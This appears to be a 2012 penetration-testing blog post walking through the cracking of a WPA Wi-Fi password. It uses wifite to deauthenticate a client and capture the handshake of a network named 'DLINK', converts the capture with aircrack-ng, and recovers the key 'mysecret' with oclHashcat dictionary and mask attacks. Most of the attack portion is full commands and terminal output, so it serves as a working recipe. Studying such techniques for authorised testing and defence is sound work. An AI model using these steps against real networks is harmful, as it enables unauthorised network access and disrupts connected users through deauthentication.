We need to capture the WPA 4 way handshake in order to perform an offline GPU attack. For this demo we’ll be using an Alfa AWUS036H wireless card under Backtrack 5 R2 64bit.
Now I could go in depth about capturing the WPA handshake manually using aircrack-ng but it has been covered in full in many places already, so instead im going to use a great python tool call wifite that automates the cracking process (it also supports automated WEP cracking using many types of attacks).
To download it it’s a simple case of using wget 🙂
1 2 3 | cd /pentest/wireless/ wget -O wifite.py http://wifite.googlecode.com/svn/trunk/wifite.py chmod +x wifite.py |
Wifite supports both command line and GUI based control, to be honest the command line use is that good I’ve never bothered with the GUI, here we’ll use the CLI.
The following command tells wifite to only target the SSID “DLINK”, attempt WPA based attacks and as we’re not supplying the dictionary only the handshake will be captured and no automated cracking with pyrit will be attempted.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 | root@bt:/pentest/wireless# ./wifite.py -e "DLINK" --no-wep --no-strip .;' `;, .;' ,;' `;, `;, WiFite r84 .;' ,;' ,;' `;, `;, `;, :: :: : ( ) : :: :: mass WEP/WPA cracker ':. ':. ':. /_\ ,:' ,:' ,:' ':. ':. /___\ ,:' ,:' designed for backtrack4 ':. /_____\ ,:' / \ [+] only scanning for WPA-encrypted networks [+] wpa handshake stripping disabled [+] searching for devices in monitor mode... [!] no wireless interfaces are in monitor mode! [+] select which device you want to put into monitor mode: 1. wlan0 Realtek RTL8187L rtl8187 - [phy1] [+] select the wifi interface (between 1 and 1): 1 [+] putting "wlan0" into monitor mode... [+] searching for devices in monitor mode... [+] defaulting to interface "mon0" [+] waiting for "DLINK" to appear, press Ctrl+C to skip... [+] found "DLINK", waiting 1 sec for clients... [+] in order to crack WPA, you will need to enter a dictionary file [+] enter the path to the dictionary to use, or "none" to not crack at all: none [+] estimated maximum wait time is 05 minutes [+] attacking "DLINK"... [0:05:00] starting wpa handshake capture [0:04:54] added new client: 60:C5:47:72:A5:75, total: 1 [0:04:51] sent 3 deauth packets; handshake captured! saved as "hs/DLINK.cap" [+] attack is complete: 1 handshake, root@bt:/pentest/wireless# |
Sucessfull 🙂 So the part we are interested in here is the DLINK.cap file. Confirm you have the handshake inside the capture file using the following command:
1 2 3 4 5 6 7 8 9 10 | root@bt:~/Desktop# aircrack-ng DLINK.cap Opening DLINK.cap Read 1971 packets. # BSSID ESSID Encryption 1 1C:AF:F7:26:11:AE DLINK WPA (1 handshake) Choosing first network as target. Opening DLINK.wifite.cap Please specify a dictionary (option -w). Quitting aircrack-ng... root@bt:~/Desktop# |
So you’ve gone to all the effort to capture the 4way handshake but you want to try and crack it using your GPU instead of using rainbow tables. Using the same 4way handshake from this post we will attempt to crack it using Hashcat.
First of all we need to convert the pcap file into one that hashcat can understand, aircrack v1.1 can do this and it comes preinstalled in BT5r2. (Note: BT5r1 uses an older version that doesn’t allow creation of hccap files)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 | aircrack-ng DLINK.cap -J DLINK Opening DLINK.cap Read 1971 packets. # BSSID ESSID Encryption 1 1C:AF:F7:26:11:AE DLINK WPA (1 handshake) Choosing first network as target. Opening DLINK.wifite.cap Reading packets, please wait... Building Hashcat (1.00) file... [*] ESSID (length: 5): DLINK [*] Key version: 2 [*] BSSID: 1C:AF:F7:26:11:AE [*] STA: 60:C5:47:72:A5:75 [*] anonce: CF 50 01 03 B5 73 08 B2 6A C2 AB 2C 07 DA 72 52 0A C3 21 60 D2 C6 DE 5F 05 93 8D 08 D0 08 9A 46 [*] snonce: 55 41 AB EA 41 5F F5 02 AF D2 02 D7 D2 84 6B D8 42 77 27 79 77 96 43 4F 34 F7 4F 7E 08 17 40 BA [*] Key MIC: 0D FA B1 7E 28 BE 07 15 86 37 3D 9F 2D 12 A0 18 [*] eapol: 02 03 00 75 02 01 0A 00 10 00 00 00 00 00 00 00 01 55 41 AB EA 41 5F F5 02 AF D2 02 D7 D2 84 6B D8 42 77 27 79 77 96 43 4F 34 F7 4F 7E 08 17 40 BA 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 16 30 14 01 00 00 0F AC 02 01 00 00 0F AC 04 01 00 00 0F AC 02 0C 00 Successfully written to DLINK.hccap Quitting aircrack-ng... |
Now it’s just a simple case of importing the new hccap file into hashcat. We’ll start of with a dictionary demo:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 | $ ./oclHashcat-plus64.bin -m 2500 DLINK.hccap darkc0de.lst oclHashcat-plus v0.07 by atom starting... Hashes: 1 Unique salts: 1 Unique digests: 1 Bitmaps: 8 bits, 256 entries, 0x000000ff mask, 1024 bytes Rules: 1 GPU-Loops: 64 GPU-Accel: 16 Password lengths range: 8 - 15 Platform: AMD compatible platform found Watchdog: Temperature limit set to 90c Device #1: Cayman, 2048MB, 0Mhz, 22MCU Device #1: Allocating 26MB host-memory Device #1: Kernel ./kernels/4098/m2500.Cayman.64.kernel (1483607 bytes) Scanning dictionary darkc0de.lst: 1047587 bytes (5.83%), 95782 words, Scanned dictionary darkc0de.lst: 17975873 bytes, 1707659 words, 1707633 keyspace, starting attack... DLINK:mysecret Status.......: Cracked Input.Mode...: File (darkc0de.lst) Hash.Target..: DLINK Hash.Type....: WPA/WPA2 Time.Running.: 13 secs Time.Util....: 13198.3ms/189.8ms Real/CPU, 1.5% idle Speed........: 67528 c/s Real, 67776 c/s GPU Recovered....: 1/1 Digests, 1/1 Salts Progress.....: 1507780/1707633 (88.30%) Rejected.....: 616522/1507780 (40.89%) HW.Monitor.#1: 89% GPU, 56c Temp Started: Fri Mar 23 18:46:36 2012 Stopped: Fri Mar 23 18:46:49 2012 |
And now a bruteforce demo using an 8char lowercase password:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 | $ ./oclHashcat-plus64.bin -a 3 -m 2500 DLINK.hccap ?l?l?l?l?l?l?l?l oclHashcat-plus v0.07 by atom starting... Hashes: 1 Unique salts: 1 Unique digests: 1 Bitmaps: 8 bits, 256 entries, 0x000000ff mask, 1024 bytes GPU-Loops: 64 GPU-Accel: 16 Password lengths range: 8 - 15 Platform: AMD compatible platform found Watchdog: Temperature limit set to 90c Device #1: Cayman, 2048MB, 0Mhz, 22MCU Device #1: Allocating 26MB host-memory Device #1: Kernel ./kernels/4098/m2500.Cayman.64.kernel (1483607 bytes) Status.......: Aborted Input.Mode...: Mask (?l?l?l?l?l?l?l?l) Hash.Target..: DLINK Hash.Type....: WPA/WPA2 Time.Running.: 6 secs Time.Left....: 36 days, 14 hours Time.Util....: 6108.4ms/87.0ms Real/CPU, 1.4% idle Speed........: 66385 c/s Real, 74004 c/s GPU Recovered....: 0/1 Digests, 0/1 Salts Progress.....: 405504/208827064576 (0.00%) Rejected.....: 0/405504 (0.00%) HW.Monitor.#1: 90% GPU, 58c Temp Started: Fri Mar 23 18:40:25 2012 Stopped: Fri Mar 23 18:40:31 2012 |
Ouch, that’s going to take ages, 36days, no thanks! To save time in the testing I’ve limited that char set chacraters to c, e, m, r, s, t & y as we know the password already and I dont like the sound of leaving it running that long and burning out my GPU!
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 | $ ./oclHashcat-plus64.bin -a 3 -m 2500 DLINK.hccap -1 cemrsty ?1?1?1?1?1?1?1?1 oclHashcat-plus v0.07 by atom starting... Hashes: 1 Unique salts: 1 Unique digests: 1 Bitmaps: 8 bits, 256 entries, 0x000000ff mask, 1024 bytes GPU-Loops: 64 GPU-Accel: 16 Password lengths range: 8 - 15 Platform: AMD compatible platform found Watchdog: Temperature limit set to 90c Device #1: Cayman, 2048MB, 0Mhz, 22MCU Device #1: Allocating 26MB host-memory Device #1: Kernel ./kernels/4098/m2500.Cayman.64.kernel (1483607 bytes) DLINK:mysecret Status.......: Cracked Input.Mode...: Mask (?1?1?1?1?1?1?1?1) Hash.Target..: DLINK Hash.Type....: WPA/WPA2 Time.Running.: 1 min, 1 sec Time.Util....: 61012.9ms/1027.7ms Real/CPU, 1.7% idle Speed........: 70893 c/s Real, 73327 c/s GPU Recovered....: 1/1 Digests, 1/1 Salts Progress.....: 4325376/5764801 (75.03%) Rejected.....: 0/4325376 (0.00%) HW.Monitor.#1: 84% GPU, 73c Temp Started: Fri Mar 23 18:37:12 2012 Stopped: Fri Mar 23 18:38:14 2012 |
Bingo, brute forcing worked (albeit with a rather restricted character set!)
Leave a Reply
You must be logged in to post a comment.